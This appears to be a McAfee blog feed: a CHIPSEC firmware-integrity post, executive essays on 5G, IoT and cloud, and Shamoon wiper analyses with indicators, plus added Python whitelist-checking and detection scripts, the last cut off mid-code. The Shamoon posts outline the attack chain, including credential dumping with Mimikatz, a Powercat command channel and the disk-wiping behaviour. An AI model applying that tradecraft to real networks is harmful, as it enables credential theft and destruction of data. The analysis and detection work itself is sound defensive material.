As part of our commitment to provide technology that can preserve the integrity of devices we rely upon, we have developed a simple module for the CHIPSEC framework that can be used to verify the integrity of EFI firmware executables on potentially impacted systems.

This work is based on many years of dedicated research conducted by the Advanced Threat Research team within the field of firmware security. CHIPSEC is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low-level interfaces, and forensic capabilities. It can be run on Windows, Linux, Mac OS X, and the UEFI shell. Instructions for installing and using CHIPSEC can be found in the manual.

NOTE: This software is for security testing purposes. Use at your own risk. Read WARNING.txt before using.

The framework is available at this link: https://github.com/chipsec/chipsec

The following outlines a method that can be used to scan system firmware to determine whether it has been modified. The example we present shows the UEFI rootkit found in the HackingTeam disclosure. To test against the most recent disclosures, a known clean list of EFI executable binaries (whitelist) must first be generated; the firmware can then be checked against it.

Below is an example of using the new tools.uefi.whitelist module on a UEFI firmware image modified to include HackingTeam’s UEFI rootkit.

  1. Generate a whitelist of EFI executable binaries from a clean/original UEFI firmware image (file named “original” in the example below). The list is generated in “original.json.” (This step assumes that there’s a way to obtain a good clean image.) In our example, 276 EFI executables were extracted from the original UEFI firmware image.

     # chipsec_main -i -n -m tools.uefi.whitelist -a generate,original.json,original

     [x][ =======================================================================
     [x][ Module: Simple whitelist generation/checking for UEFI firmware
     [x][ =======================================================================

     [*] reading firmware from 'original'...
     [*] generating a list of EFI executables from firmware image...
     [*] found 276 EFI executables in UEFI firmware image 'original'
     [*] creating JSON file 'C:\chipsec\original.json'...

  2. At a later time, one can verify the integrity of UEFI firmware extracted from flash ROM memory against this list of expected EFI executables. The previous step records hashes in the file efilist.json. In our example, we verify the integrity of another UEFI firmware image, named “unpacked.” Running the tools.uefi.whitelist module against this image with “original.json” containing the expected list (whitelist) of EFI executables yields the following output.

     # chipsec_main -i -n -m tools.uefi.whitelist -a check,original.json,unpacked

     [x][ =======================================================================
     [x][ Module: Simple whitelist generation/checking for UEFI firmware
     [x][ =======================================================================

     [*] reading firmware from 'unpacked'...
     [*] checking EFI executables against the list 'C:\chipsec\original.json'
     [*] found 279 EFI executables in UEFI firmware image 'unpacked'
     [!] found EFI executable not in the list: d359a9546b277f16bc495fe7b2e8839b5d0389a8
         <unknown>
         {EAEA9AEC-C9C1-46E2-9D52-432AD25A9B0B}
         ed0dc060e47d3225e21489e769399fd9e07f342e2ee0be3ba8040ead5c945efa (sha256)
     [!] found EFI executable not in the list: 64d44b705bb7ae4b8e4d9fb0b3b3c66bcbaae57f
         rkloader
         {F50258A9-2F4D-4DA9-861E-BDA84D07A44C}
         3a4cdca9c5d4fe680bb4b00118c31cae6c1b5990593875e9024a7e278819b132 (sha256)
     [!] found EFI executable not in the list: 4a1628fa128747c77c51d57a5d09724007692d85
         Ntfs
         {F50248A9-2F4D-4DE9-86AE-BDA84D07A41C}
         dd2b99df1f10459d3a9d173240e909de28eb895614a6b3b7720eebf470a988a0 (sha256)
     [!] WARNING: found 3 EFI executables not in the list 'C:\chipsec\original.json'

The tools.uefi.whitelist module found three additional EFI executable binaries, which were not present in the original firmware image. The “unpacked” firmware image has 279 EFI executable binaries including the 276 original executables and three executables injected by the HackingTeam’s UEFI rootkit (rkloader, Ntfs, and an unnamed EFI application).

The preceding example is just for illustration purposes and assumes you’ve extracted EFI firmware on your system prior to generating the whitelist and later before checking the firmware. This can be done with the CHIPSEC framework using the following command:

# chipsec_util spi dump firmware.bin

However, a separate step to dump the firmware image is not required when using the tools.uefi.whitelist module. It extracts EFI firmware from flash ROM memory automatically if the firmware file is not specified.

We recommend generating an EFI whitelist after purchasing a system or when you are sure it has not been infected:

# chipsec_main -m tools.uefi.whitelist -a generate

Then check the EFI firmware on your system periodically or whenever you are concerned, such as when a laptop was left unattended:

# chipsec_main -m tools.uefi.whitelist -a check
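The generate/check procedure above reduces to a hash set comparison. The script below is an added example, not CHIPSEC's own code: firmware parsing is out of scope, so each "image" is a constructed dict of module name to module bytes standing in for the EFI executables the tools.uefi.whitelist module extracts, and the module names and contents are made up except for rkloader and Ntfs, which are taken from the output above. It goes one step beyond the quoted run: besides reporting executables not on the list, it also reports list entries that are absent from the image, which is how a modified (rather than added) module shows up, since its hash changes.

```python
import hashlib
import json
from typing import Dict, List, Tuple

# Constructed stand-ins for the executables extracted from a firmware image.
# Names marked (*) are taken from the output quoted above; everything else,
# including all contents, is invented for the example.
ORIGINAL_IMAGE: Dict[str, bytes] = {
    "PlatformInitPei": b"MZ\x90\x00PEI platform init (constructed)",
    "UsbBusDxe":       b"MZ\x90\x00USB bus driver (constructed)",
    "SecurityStubDxe": b"MZ\x90\x00security stub (constructed)",
}
# Same image with two extra executables injected, as in the rootkit case above.
INFECTED_IMAGE: Dict[str, bytes] = dict(ORIGINAL_IMAGE, **{
    "rkloader": b"MZ\x90\x00injected loader (constructed) (*)",
    "Ntfs":     b"MZ\x90\x00injected filesystem driver (constructed) (*)",
})
# Same image with one original executable modified in place.
TAMPERED_IMAGE: Dict[str, bytes] = dict(
    ORIGINAL_IMAGE, UsbBusDxe=b"MZ\x90\x00USB bus driver PATCHED (constructed)")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def generate_whitelist(modules: Dict[str, bytes]) -> Dict[str, Dict[str, str]]:
    """Key the list by SHA-256 so a renamed-but-identical module still passes."""
    return {sha256_hex(b): {"name": name} for name, b in modules.items()}


def whitelist_to_json(whitelist: Dict[str, Dict[str, str]]) -> str:
    """Serialise for storage off the machine being checked."""
    return json.dumps(whitelist, indent=2, sort_keys=True)


def whitelist_from_json(text: str) -> Dict[str, Dict[str, str]]:
    return json.loads(text)


def check_image(modules: Dict[str, bytes],
                whitelist: Dict[str, Dict[str, str]]) -> Tuple[List[Tuple[str, str]], List[str]]:
    """Compare an image with the list.

    Returns (unknown, missing): unknown holds (name, sha256) for executables
    whose hash is not on the list (the '[!] found EFI executable not in the
    list' case above); missing holds list entries no longer present in the
    image. A modified module appears in both, because its hash changed.
    """
    image = {sha256_hex(b): name for name, b in modules.items()}
    unknown = sorted((name, h) for h, name in image.items() if h not in whitelist)
    missing = sorted(entry["name"] for h, entry in whitelist.items() if h not in image)
    return unknown, missing


if __name__ == "__main__":
    # Generate once from the clean image, round-trip through JSON as a stored list would.
    stored = whitelist_to_json(generate_whitelist(ORIGINAL_IMAGE))
    wl = whitelist_from_json(stored)
    for label, img in (("infected", INFECTED_IMAGE), ("tampered", TAMPERED_IMAGE)):
        unknown, missing = check_image(img, wl)
        print(f"{label}: {len(img)} executables, {len(unknown)} not in list, {len(missing)} missing")
        for name, h in unknown:
            print(f"  [!] found EFI executable not in the list: {name} {h}")
```

The list should be generated from firmware you trust and stored somewhere the platform being checked cannot rewrite; a whitelist kept on the same disk as a compromised system is only as good as that system's integrity.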

In the recent disclosures, another EFI firmware malware for Mac OSX systems, DarkMatter, has surfaced. It appears to include multiple EFI executable components that it injects into the EFI firmware on a target system at different stages of infection. If one has generated a whitelist of known good EFI executables from the firmware image beforehand, then running the new tools.uefi.whitelist module on a system with EFI firmware infected by the DarkMatter persistent implant would likely result in a detection of these extra binaries added to the firmware by the rootkit.

EFI firmware malware is a new frontier for stealth and persistent attacks that may be used by sophisticated adversaries to penetrate and persist within organizations and national infrastructure for a very long time. Use open-source CHIPSEC to defend from this threat and stay safe.

Additionally, the recent WikiLeaks disclosure referenced a vulnerability related to the McAfee Security Stinger tool. We can confirm that the Stinger tool issue is no longer present in our current technology. Users downloading the Stinger today will not be subject to attacks using the suggested exploit scenario.

The post CHIPSEC Support Against Vault 7 Disclosure Scanning appeared first on McAfee Blogs.

The 5G reality
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/the-5g-reality/
Tue, 07 Mar 2017 18:15:43 +0000
Mobile World Congress has come and gone. With over 100,000 attendees at the show, people gathered around the impressive booths to get a glimpse at what the world’s biggest mobile brands had to offer in 2017.

There was definitely a theme of nostalgia at play with the highly anticipated return of the classic Nokia 3310 (including Snake!), as well as other exciting and impressive device launches from the likes of LG and Sony.

But walking around the show floor and talking to people over the course of the four days, it became clear it was not the devices taking centre stage, but in fact 5G. Everywhere I looked I saw companies shouting about being at the ‘cutting edge of 5G’.

Now, 5G was definitely on everyone’s radar at last year’s MWC, but this year it felt slightly more real. In fact, Mats Granryd, director-general of GSMA, even said ahead of the show: “We will move away from being vague on the prospects of 5G this year to concrete proposals.” And he was right: we saw this from many of the big mobile players at the show fighting to be seen as being at the forefront of 5G. Because this ‘transformative power’ is no longer just hype, but set to become a reality in the next few years.

And as exciting as 5G is – and it is incredibly exciting – I’m also concerned about its arrival. Because with 5G comes a world of vulnerabilities – a world of security vulnerabilities that no one seems to be discussing or addressing in their proposals. With 5G comes download speeds of up to 10 gigabits per second (that’s 1,000 times faster than the current US 4G average), but what that also means is thousands more devices introducing more vulnerabilities into a world already struggling to deal with the countless devices flooding the internet.

Our recent Mobile Threats Report found more than 4,000 potentially malicious apps had been removed from Google Play, and 500,000+ devices still have these apps actively installed, putting users’ security at risk. This is happening now in a world of 4G, highlighting the fact that there are existing security issues that we must address before we should even consider bringing 5G to consumers.

As we veer closer to a world of 5G hyper connectivity, we must not forget security. And OK, it may not sound like the sexiest part of the ‘5G revolution’ but it has a huge role to play, and my mind will not be at ease until we start to address it. Because 5G will be an ‘evolution’ and the sooner security is considered the better for all of us.

In the coming months, I hope to see these very companies, who are touting how they are revolutionising our worlds with 5G, telling us how they plan to address the security and privacy implications that come with it. It’s key that our safety and security are considered first.


The post The 5G reality appeared first on McAfee Blogs.

If we can’t trust technology we won’t (and shouldn’t) use it
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cant-trust-technology-wont-shouldnt-use/
Mon, 27 Feb 2017 16:53:35 +0000

The post If we can’t trust technology we won’t (and shouldn’t) use it appeared first on McAfee Blogs.
Walking this year’s Mobile World Congress I am no longer thrown by the devices, gadgets and flashy booths, but completely mystified at how we as an industry continue to hype up the idea of a truly connected world without addressing one of the most important pieces – security.

As someone who’s been in the industry for almost 20 years, you’d expect me to be shocked that many businesses still aren’t addressing something so key, especially as consumers are starting to question it. In the last year, more people than ever have started asking me: “So Raj, what about my security?”

Hurrah – finally – some people are catching on, and at least asking the question. But whether or not they’ll act upon it is what concerns me…

Don’t get me wrong. Whilst it’s great that some people are waking up to the realities that come with a connected lifestyle (which, let’s admit, is everyone’s lifestyle at this stage), there is still a lot of work to do. Ultimately, it’s the industry’s job – that’s right, every single person at MWC and beyond – to lead this.

Because at the moment we’re failing. Our recent survey, for example, found half of us have no idea how to check if our devices have ever been compromised and a third are unsure how to check if a device has been breached. So although many may be starting to consider device security, it doesn’t mean they necessarily know how to manage it. Yet here we are at MWC giving these same people even more technologically advanced devices to play with – when we know most are unsure how to protect themselves – whether that’s with their phones, computers, kids’ toys, or now connected homes and cars.

The truth is that with awesome technology comes great responsibility. So what do we – both consumers and businesses alike – do to ensure that the technology coming out of big shows like this is safe?

  • Put security first: security cannot be an afterthought in any device manufacturing process. It must be considered upfront by manufacturers in order for any underlying issues to be addressed and catered for
  • Be transparent: enough of the hiding, let’s be honest with consumers about the risks associated with using certain technology. Instead of hiding away and hoping it’s all OK, vendors must at least educate and advise the user on how best to protect themselves, including recommending security software suitable for that technology
  • Take control: whilst I want to see manufacturers leading the way when it comes to security, consumers can and should do their bit too. Take device security at home, for example, where the home network is the hub for all connected devices. New solutions, such as McAfee Secure Home Platform, will help people easily manage and protect devices connected to this network while providing parental controls with permissions that can be tailored to the entire household


We must be able to trust the new technology that’s making our world a hyper-connected one – as inventors, product developers, manufacturers, technology leaders from the word ‘go’ in our development cycles, through to the consumers’ lives when they use it. Trust has fallen down across our societies because of all the security hacks, risks and wider vulnerabilities that technology has opened up. It’s our job – each and every one of us – to help change that via our actions as an industry. Let’s continue producing amazing and innovative technology that helps change and advance our lives, but let’s protect ourselves – our friends, our economies, our neighbours and the wider industry – while we do. The more we can work together to build this trust, the better off each technology will be for everyone.

Technology companies should ‘at least do no harm’
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/technology-companies-least-no-harm/
Wed, 22 Feb 2017 17:38:36 +0000

The post Technology companies should ‘at least do no harm’ appeared first on McAfee Blogs.
Mobile World Congress (MWC) provides yet another opportunity for technology giants to flex their muscles and whip the industry into a frenzy. Even more so than last year, mobile is a reflection of the Internet of Things (IoT) and the hyper-connected world we find ourselves living in. Following in the footsteps of CES, I expect to see a heavy focus on ‘smart’ technology as everything from hairbrushes to fridges and even pregnancy tests looks to receive an IP overhaul.

But as companies battle to stay ahead of the competition, racing to bring innovative products to market, many are stumbling when it comes to security. And I’m worried.

In the last year alone, some of the worst IoT vulnerabilities have come to light, with the security of connected cars and even pacemakers being called into question. Never mind the threat of identity and financial theft, if cybercriminals are able to hack and control these objects, consumers’ physical health and safety could be at risk.

Traditionally in the automotive industry, for example, every aspect of the car would be rigorously tested to ensure drivers and passengers are as safe as possible. However, we haven’t seen the same stringent approach taken to protecting our increasingly computerised cars from hackers. Although driverless cars may not be mainstream, research from McAfee suggests 78% of new cars will be connected to the Internet by 2022 and therefore open to potential security breaches.

The lack of importance placed on cybersecurity has filtered through to consumers and is reflected in attitudes to data protection in connected devices. People wouldn’t dream of driving a car off the forecourt without seatbelts, yet they’ll happily invest in the next flashy car without knowing whether it has adequate cyber security in place.

MWC is the perfect platform for influential figures within technology and the wider industries such as health and automotive, which are investing heavily in connected devices, to discuss the ramifications of our increasingly connected world. We must continue to innovate, but we also have to work together to ensure that the latest technology doesn’t put consumers’ data or safety at risk. As an industry, we need to develop strict standards for manufacturers, with clear consequences for falling short of these standards.

Consumers also have a responsibility to drive change. If consumers refuse to buy products that are not properly secured, companies developing such products will start to take note and we’ll see security becoming more of a priority.

Data security is not a trend, it’s an ethical issue that holds the potential to impact us all if not taken seriously. With 5G on our doorsteps, hyper-connectivity will soon be a reality and more data than ever before will be transferred across networks via millions of devices. It’s imperative that we get security right and ensure products do not pose a threat to users.

As my colleague, Chris Young, said at this year’s RSA, “we have to start thinking of ourselves as smaller players in a bigger fight… we’re better when we link arms with like-minded partners, intent on the same goals.”

But if further collaboration is too much to ask, the Hippocratic oath is a simple philosophy that those involved in developing our connected world would do well to take note of: ‘help, or at least do no harm’.

Cloud Ubiquity – it’s coming, but not yet!
https://securingtomorrow.mcafee.com/business/cloud-security/cloud-ubiquity-coming-not-yet/
Mon, 13 Feb 2017 05:00:47 +0000

The post Cloud Ubiquity – it’s coming, but not yet! appeared first on McAfee Blogs.
Brace yourself: adoption of cloud computing is on its way, with 93% of organizations using cloud services today. Just don’t ask when ubiquity will occur! One year on, the answer to the question of how many months until IT budgets are 80% in the cloud is down from 16 months to ‘only’ 15. Technically speaking, ubiquity should happen somewhere around April 2018. However, migrating to the cloud is not as simple as it seems.

The intention to move to the cloud is definitely there: trust in the cloud has risen, with those trusting public cloud outweighing those who distrust it 2:1. However, a number of obstacles are impacting the full migration toward cloud computing. One of these obstacles is something that has been discussed for some time now, and confirmed by our recent survey: the talent shortage. The majority of enterprises have slowed their cloud adoption due to the lack of cybersecurity skills on their staff.

The above statistic is a little surprising at first glance. A well-documented advantage of cloud computing has been to allow organizations to focus on their core business, leaving the technical challenges of managing server infrastructure and security to specialist providers. However, the above clearly demonstrates that the old adage “you can outsource the work but not the risk” rings true with many organizations. This raises the question of whether the skills in short supply are the same as those sought for internally provisioned services. I remember participating in a panel with Jim Reavis from the Cloud Security Alliance, and the consensus was that technical skills will be less in demand for enterprises, as demand shifts to the skills needed to monitor the security posture of controls deployed by third parties (i.e. more management).

Our survey indicated 74% of organizations are storing sensitive data in the public cloud, and personal customer information is the most popular form of this sensitive data. This leads us to believe that the demand for data visibility and protection skills will be on the rise. Data protection requirements demand that the data controller (the enterprise) must ensure that the data processor (the service provider) still has the appropriate controls in place.

Unfortunately, when IT says “no” to the lines of business, perhaps due to the skills shortage, the lines of business are adopting cloud on their own. In fact, 40% of cloud services are being procured outside the visibility and control of the IT department. This is even more worrisome for your data protection security posture and argues for considering automated tools for cloud data protection.


Spotlight on Shamoon
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/spotlight-on-shamoon/
Fri, 27 Jan 2017 18:59:46 +0000

The post Spotlight on Shamoon appeared first on McAfee Blogs.
Our analysis this month has pointed to Shamoon emerging in the Middle East. We have recently seen a number of similarities that we had highlighted in our earlier blogs (on mcafee.com). The campaign continues to target organizations in the Middle East from a variety of verticals. Reports suggest that a further 15 disk-wiping Shamoon incidents have occurred in public and private sectors.

Rev.2 campaign

The code for the current revision is almost identical to the original version; the changes include the addition of a victim’s credentials to spread and execute the wiper across a large part of the environment. In the following screenshot, we can see that the old encoded resource names PKCS12, PKCS7, and X509 are still present in the new variants but are not used.

[Screenshot omitted from this copy]

A question that many of us in the industry have asked ourselves is: how were the attackers able to gain the credentials from so many victims in the Middle East? Let’s approach this from the attacker’s view and follow the Cyber Kill Chain steps.

Reconnaissance

An attack group prepares a plan and identifies the victims it wants to hit to create an impact or make a statement. The group gathers email addresses and other open-source intelligence as the first step to preparing for the campaign. They register domains, code backdoors, and prepare for the reconnaissance phase. When all is tested, the initial attack starts with spear phishing:

[Screenshot omitted from this copy]

The victims receive emails, for example, one like the preceding business proposal. The email also contains a tempting attachment. When opening the attachment, some victims saw this:

[Screenshot omitted from this copy]

Any requirement to activate macros before seeing content should set off alarm bells. Analyzing the document, we received confirmation of our suspicions:

[Screenshot omitted from this copy]

Decoding the obfuscated macro code results in a PowerShell script that proceeds to download a file, a Trojan capable of gathering system information and downloading other tools.

In other cases, we found a backdoor using a PowerShell script to gather information from the system and write to a temporary file. A code snippet:

[Screenshot omitted from this copy]

We also found a script that creates an instance of Mimikatz, a tool known to dump user credentials from a computer:

  • CreateMimi1.Bat or CreateMimi2.Bat

When all the data are gathered, the information is uploaded. To open a command channel, the attackers used, for example, a PowerShell script that launches Powercat, a TCP/IP “Swiss army knife” that works with netcat. A code example:

[Screenshot omitted from this copy]

Weaponization

The attackers invariably sort the credentials of the victims to gain an indication of the IP range and possible scale of the network. Depending on the goal of the attack, a selection of victims can be made to serve the cause. From the original Shamoon code, the current attackers have made several changes:

  • Added victims’ credentials
  • Replaced the picture of the flag with one of the boy
  • Changed resource language to Yemeni Arabic
  • Tested samples

Delivery/Exploitation/Installation/Control servers/Action on objectives

In these phases, the actors needed only one or two hosts in the victim’s network as a beachhead to upload the wipers and scripts. Because the attackers already had valid credentials, no exploitation was needed.

Batch file:

[Screenshot omitted from this copy]

The batch file copies ntertmgr32.exe (one of many filenames of the Shamoon 2 variant) and starts it. Once the hardcoded date was reached, systems were wiped. Objective accomplished.

Actor sophistication

Our analysis of the execution of this attack tells a story about the actors’ capability and skills. Their attack precision is very good; they know whom and what to attack, in this case to disrupt and leave a statement. Their focus is on Windows and they use well-known practices to gather information and credentials, with no zero-days. From a coding perspective, many security industry colleagues have already commented on the sloppy coding practices. From an operations security perspective (how well are the actors able to hide details that could lead to them?), we noticed that quite a few details are available: email addresses, program database paths, and Yemeni Arabic as the language identifier of almost all the samples, although we discovered one sample with a different language identifier. Was that on purpose, or a slip by the actor because this was a large campaign?

Indicators

Domains:

  • winappupdater.com
  • update.winupdater.com

The domain was registered on 2016-11-25 by benyamin987@mail.com; the samples with hashes 146a112cb01cd4b8e06d36304f6bdf7b and bf4b07c7b4a4504c4192bd68476d63b5 were connecting to this site.

Hashes:

  • 146a112cb01cd4b8e06d36304f6bdf7b
  • bf4b07c7b4a4504c4192bd68476d63b5
  • a96d211795852b6b14e61327bbcc3473
  • 1507A4FDF65952DFA439E32480F42CCF1460B96F

File locations and filenames:

Collection of system information:

  • %localappdata%\Microsoft\Windows\Tmp765643.txt (the general pattern is Tmp[6 digits].txt)

Filenames and Locations:

  • Microsoft\Windows\ccd
  • Microsoft\Windows\ccd6.exe
  • Microsoft\Windows\ssc
  • Microsoft\Windows\tss.ps1
  • Microsoft\Windows\Tmp9932u1.bat
  • Microsoft\Windows\Tmp765643.txt
  • Microsoft\Windows\dp.ps1
  • Microsoft\Windows\ccd61.ps1

Interesting strings in code samples:

  • F:\Projects\Bot Fresh\Release\Bot Fresh.pdb
  • F:\Projects\Bot\Bot\Release\Ism.pdb
  • G:\Projects\Bot\Bots\Bot5\Release\Ism.pdb


STAR- A Window to the Cloud
https://securingtomorrow.mcafee.com/business/cloud-security/star-window-cloud/
Thu, 19 Jan 2017 19:20:22 +0000

The post STAR- A Window to the Cloud appeared first on McAfee Blogs.
We are all going to live in the cloud. Well, that is what every study and forecast tells us. From our Clash of Clans villages to our connected cars, we can expect all of our data to be hosted in an unmarked data center in a town that we have never heard of. Perhaps this is a slight exaggeration, but the reality is that many of us simply have no idea where our data will be stored, and even if we are given the name of a physical location we have little insight into the operational procedures, staff vetting, or even physical security employed at the location. This old chestnut is described as the lack of transparency, but the truth is that cloud service providers do remain transparent so long as you ask the question.

It sounds simple, and indeed by all accounts major providers have entire teams dedicated to just that: answering questions from potential customers about the security controls deployed on site. Such a process, however, is incredibly inefficient, and reminds me of how insurance used to work. I remember getting the telephone book and flicking to the section titled insurance. There you would phone as many providers as you could, answering questions about your car in order to find the most competitive quote. With every call, you felt a small part of your youth just ebbing away as your tolerance for small talk reduced with every quote. In the end you were met with a saving of eleven pounds for three hours’ work. Of course it was worth it, wasn’t it?

In many cases every element of our industry is met with a similar fragmented approach: if you want a quote for staff training, do a Google search and contact every training company you have the patience to contact. Differentiating commoditized offerings such as insurance by price is simple, but deciding which company you want to host all of your corporate data, well, that is a different matter.

It is for this reason that the Cloud Security Alliance, and in particular the Security, Trust & Assurance Registry (STAR) is such a valuable resource. This program encompasses key principles of transparency and a validation of the security posture of cloud offerings. The STAR program includes a complimentary registry that documents the security controls provided by popular cloud computing offerings. This publicly accessible registry is designed for users of cloud services to assess their cloud providers, security providers and advisory and assessment services firms in order to make the best procurement decisions. Now in one single place, potential cloud customers can gain insight into the security maturity of multiple providers in a single instance. Recognizing the need for greater transparency we are pleased to confirm that McAfee has our McAfee ePolicy Orchestrator Cloud STAR certified and will add others as they come online.

It is not a question of whether the cloud will be ubiquitous, but whether we can ensure that the data centers holding every detail of our business or personal life have the appropriate level of protection. The STAR initiative is integral to providing a foundation for anybody considering using such services, but more importantly the CSA has been at the forefront of cloud security.

So if you are considering outsourcing your work, make sure that STAR is your first port of call, and you should consider attending the CSA Summit at RSA this year on February 13, where I will be sharing my thoughts on “Security in the Cloud: Evolution or Revolution?”

Shamoon Rebooted in Middle East, Part 2
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-rebooted-middle-east-part-2/
Fri, 09 Dec 2016 19:14:08 +0000

The post Shamoon Rebooted in Middle East, Part 2 appeared first on McAfee Blogs.
Last week we provided some initial analysis on recent attacks targeting organizations in the Middle East.  The attack has hallmarks of the Shamoon campaign of 2012. We now have additional data related to the components used within the new campaign, which has three distinct components: dropper, wiper, and wiper driver.

The language of these three components—PKCS12 (wiper), PKCS7, and X509—is lang:9217, which translates to Yemeni Arabic. We also see both 32- and 64-bit versions.

The malware spreads over the network using the IPC$ share and embedded administrator credentials from the targeted organization (the credentials were recovered from one of the samples), so we can assume that the attackers already had a beachhead from which to gather them. The password was also very strong, another indicator that the attackers might have had network access to compromise passwords and accounts. Indeed, our Foundstone team, which has conducted significant work on both campaigns, has confirmed that individuals (not related to the attacks) have shown off their technical prowess by publicizing the compromised credentials on public forums.

The malware tries to disable User Account Control, verifies whether it is connected with admin credentials, and drops the payload in the System32 folder. Another run option is to use the AT command to schedule a job that executes the payload.

Wiping function

The wiper component was hardcoded to start Thursday, November 17 at 20:45, after the beginning of Saudi Arabia’s Friday holiday, when most employees have left and after the evening prayer time.

The wiper component verifies the date and extracts the wiper payload to System32 using the same random names as generated by the Shamoon code from 2012. The wiper has three options for deletion: F, E, and R. The F option wipes the data with the JPEG of the Syrian refugee boy Alan Kurdi lying drowned on the beach. The E and R options wipe using random values. Shamoon 1 used a JPEG of a burning US flag.

Also during the mass deletion, the wiper uses the Eldos RawDisk driver to change the system time to August 2012, probably so that the trial period of the driver’s temporary license does not expire.

We have found many similarities between the 2012 attack and this recent campaign. There are a few alterations to the code and political themes, but overall we see a similar framework and process.

Detection

In cooperation with McAfee Labs we can confirm that all related samples of this attack are detected by the signature DistTrack![partial-hash].

The driver used for the wiper is legitimate software. Thus this threat carries the on-screen warning Possibly Unwanted Program. We will continue our analysis, particularly as our Foundstone team identifies additional indicators.

Shamoon Rebooted?
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-rebooted/
Tue, 29 Nov 2016 12:15:24 +0000

The post Shamoon Rebooted? appeared first on McAfee Blogs.
We have recently received notifications and samples from impacted organizations in the Middle East that have hallmarks of the Shamoon campaign from 2012. The main component of these attacks was the usage of a wiper component that, once activated, destroyed the hard disks of infected machines.

The initial infection vector for the recent attacks is unknown. Analyzing the submitted files, we started to recognize similar tactics and procedures that we discovered in 2012.

When the initial executable is run, it creates a copy of itself in the %SystemRoot%\System32 folder using the name trksrv.exe and starts itself as a new service.

After the trksvr service has started, it drops files, in either a 32- or 64-bit version, depending on the victim’s system. Reverse engineering one of the binaries, we discovered the following random-name examples that could be used for these 32- or 64-bit binaries:

  • ntdsutl.exe
  • power.exe
  • rdsadmin.exe
  • regsys.exe
  • sigver.exe
  • routeman.exe
  • ntnw.exe
  • netx.exe
  • fsutl.exe
  • extract.exe

Some of these filenames are the same as those used in the first Shamoon attack; other filenames are new.

This dropped executable is the wiper module and is responsible for overwriting various files on the hard disk and also the master boot record and boot sector.

The wiper module also drops the file drdisk.sys, which is a standard component from a commercial application (Eldos) that allows programs low-level access to hard disk drives. This driver was used in the first Shamoon attack, and again in this new campaign.

The wiper module initiates an enumeration of files on the victim’s disk and writes the results to a file with the extension “.pnf,” the file that the wiper module will use as an input for which files to wipe.

We are continuing our investigation into this campaign, and intend to publish further analyses.

McAfee Labs detects samples with the following names:

  • W32/DistTrack
  • Artemis detection
  • DistTrack!sys
  • Trojan-FKIQ![hash]
  • Trojan-FKIR![hash]
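The three Shamoon posts above (“Spotlight on Shamoon”, “Shamoon Rebooted in Middle East, Part 2” and “Shamoon Rebooted?”) describe host behaviours a defender can hunt for: the dropper copied to System32 and registered as a service, the randomly named wiper binaries, the drdisk.sys RawDisk driver, the .pnf target list, the Tmp[6 digits].txt collection file and the clock roll-back to August 2012. The script below turns those into triage rules over endpoint telemetry; it is an added example, not McAfee or Foundstone code, and the event record format, field names and sample events are constructed assumptions.

```python
"""
Endpoint-telemetry triage for the Shamoon 2 behaviours described in the
McAfee posts.  Added example: the event schema (dicts with a "type" key)
and SAMPLE_EVENTS are constructed for illustration, not real telemetry.
"""
import re
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Random wiper filenames recovered from the binary ("Shamoon Rebooted?") plus
# ntertmgr32.exe, the name copied by the batch file in "Spotlight on Shamoon".
WIPER_NAMES = {
    "ntdsutl.exe", "power.exe", "rdsadmin.exe", "regsys.exe", "sigver.exe",
    "routeman.exe", "ntnw.exe", "netx.exe", "fsutl.exe", "extract.exe",
    "ntertmgr32.exe",
}
# The posts spell the dropper both ways; match either.
DROPPER_NAMES = {"trksrv.exe", "trksvr.exe"}
# Eldos RawDisk driver dropped by the wiper module for low-level disk access.
RAWDISK_DRIVER = "drdisk.sys"
SYSTEM32 = re.compile(r"^[a-z]:\\windows\\system32\\", re.I)
# Collection file Tmp[6 digits].txt under %localappdata%\Microsoft\Windows.
RECON_TMP = re.compile(r"\\appdata\\local\\microsoft\\windows\\tmp\d{6}\.txt$", re.I)

Event = Dict[str, str]
Finding = Tuple[str, Event]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Event) -> Optional[str]:
    """Map one telemetry record to a Shamoon 2 indicator label, or None."""
    kind = event["type"]
    if kind == "file_create":
        path = event["path"]
        name = _basename(path)
        in_sys32 = bool(SYSTEM32.match(path))
        if in_sys32 and name == RAWDISK_DRIVER:
            return "rawdisk_driver_dropped"
        if in_sys32 and name in DROPPER_NAMES:
            return "dropper_copied_to_system32"
        if in_sys32 and name in WIPER_NAMES:
            return "wiper_binary_dropped"
        # The wiper writes its enumeration of files to wipe to a .pnf file.
        if name.endswith(".pnf") and _basename(event.get("process", "")) in WIPER_NAMES:
            return "wiper_target_list_written"
        if RECON_TMP.search(path):
            return "recon_collection_file"
    elif kind == "service_create":
        if _basename(event["image"]) in DROPPER_NAMES:
            return "dropper_service_registered"
    elif kind == "time_change":
        # Part 2: the wiper sets the clock back to August 2012 so the RawDisk
        # trial licence does not appear expired.  A jump of over a year back
        # into that month is the signal; small corrections are ignored.
        old = datetime.fromisoformat(event["old"])
        new = datetime.fromisoformat(event["new"])
        if (new.year, new.month) == (2012, 8) and (old - new).days > 365:
            return "clock_rolled_back_to_aug_2012"
    return None


def triage(events: List[Event]) -> List[Finding]:
    """Return every (label, event) pair that matched a rule, in input order."""
    findings: List[Finding] = []
    for ev in events:
        label = classify(ev)
        if label:
            findings.append((label, ev))
    return findings


def verdict(findings: List[Finding]) -> str:
    """Escalation tier from the distinct indicators seen on one host."""
    kinds = {label for label, _ in findings}
    if kinds & {"rawdisk_driver_dropped", "clock_rolled_back_to_aug_2012"}:
        return "wiper staged: isolate host"
    if len(kinds) >= 2:
        return "probable Shamoon 2 staging"
    if kinds:
        return "single indicator: investigate"
    return "no match"


# Constructed sample telemetry for one host (not real data).
SAMPLE_EVENTS: List[Event] = [
    {"type": "file_create", "path": r"C:\Windows\System32\trksrv.exe",
     "process": r"C:\Users\alice\Downloads\sample.exe"},
    {"type": "service_create", "name": "TrkSvr",
     "image": r"C:\Windows\System32\trksrv.exe"},
    {"type": "file_create", "path": r"C:\Windows\System32\netx.exe",
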